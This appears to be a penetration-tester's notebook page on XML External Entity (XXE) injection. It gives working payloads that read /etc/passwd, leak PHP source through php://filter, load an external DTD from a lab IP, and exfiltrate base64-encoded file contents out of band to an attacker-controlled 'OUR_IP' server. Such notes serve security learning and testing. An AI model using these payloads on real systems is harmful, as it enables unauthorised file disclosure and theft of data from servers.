XML External Entity (XXE)

XXE happens where we can inject our XML inputs and those inputs are not being sanitized by XML Parser

Basic XXE Payloads

#Simple File read
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

#php filters
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>

Basic XXE Testing

In the below image i can see that my email is getting reflected back to me, so i will test for XXE in that parameter

now i will test for Basic XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>	
<root>
<name>test</name>
<tel>1122112211</tel>
<email>&test;</email>
<message>sadadasdasdasd</message>
</root>

XXE PHP Filters to Read Source Code

We can now try to read the source code using php filters, i will try to read connection.php file

<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>

Advanced File Disclosure (XXE CDATA)

if the web app is not build in php then php filters cannot help us, for this we can use CDATA and read any sort of file including binary data as well.

This will not work, because we cannot join internal and external entities in XML like this, so we need to find out another way

so i will host an DTD on my Python server

now this will get the DTD from my python server.

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///flag.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.15.163/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>

now I can read the files as well.

Blind XXE (Out of Band Data Exfiltration)

Sometimes you don't get a response from the website so you need to redirect the response to your own python server

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

We need to host the xxe.dtd on our python server

PreviousServer Side Request Forgery (SSRF)NextServer Side Template Injection (SSTI)

Last updated